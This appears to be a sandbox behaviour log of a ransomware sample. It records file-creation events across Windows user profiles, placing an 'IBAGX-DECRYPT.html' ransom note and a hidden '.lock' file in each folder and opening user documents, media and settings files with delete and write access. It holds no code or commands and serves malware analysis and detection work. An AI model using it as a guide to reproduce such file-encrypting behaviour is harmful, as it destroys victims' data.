Create C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\MSN Autos.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\MSN Money.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\MSN Sports.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\MSN.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\MSNBC News.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\Windows Live\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Favorites\Windows Live\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Favorites\Windows Live\Get Windows Live.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Links\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Links\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Default\Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\My Documents\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Default\My Documents\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\NetHood\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\NetHood\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\NTUSER.DAT.LOG1 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\ntuser.ini desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Default\Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\PrintHood\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\PrintHood\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Recent\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Recent\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Saved Games\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Saved Games\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Searches\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Searches\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Searches\Everywhere.search-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Default\Searches\Everywhere.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Default\Searches\Indexed Locations.search-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Default\Searches\Indexed Locations.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\Default\SendTo\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\SendTo\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Start Menu\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Start Menu\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Templates\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Templates\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Default\Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default User\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Default User\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\-vZCBx3T8O8PG8Z7.rtf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\0IDnC0H9EMmV.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\40id.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\41xTLbSy8hho.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\5TbJjRTqQcJAG8oUNN.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\ABdV76mhVKc67XfMG.odp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Collab\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Collab\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Forms\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Forms\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Flash Player\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Flash Player\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Flash Player\AssetCache\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Flash Player\AssetCache\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Headlights\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Headlights\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Linguistics\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Linguistics\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Linguistics\Dictionaries\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Linguistics\Dictionaries\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\LogTransport2\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\LogTransport2\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Cav7r34AQxz266BdGIX.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\CmR7tOD7XC.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\D1Mcqgb3FDTv-8KryA5.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\D4hFvv-xbwD80n_k.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\d9-2p9zLf4.pdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\du-5F19JYW5jR0wN.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\eybr.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\g-uvZ0afpQw.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\H5WuKLQ 4 uu.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\iaG_GkHNHdnzSAk_0f.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Identities\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Identities\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\jEsyH8xMpokXjc mOu0.ods desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\k34HcmsYrEK4_.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\AddIns\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\AddIns\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Credentials\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
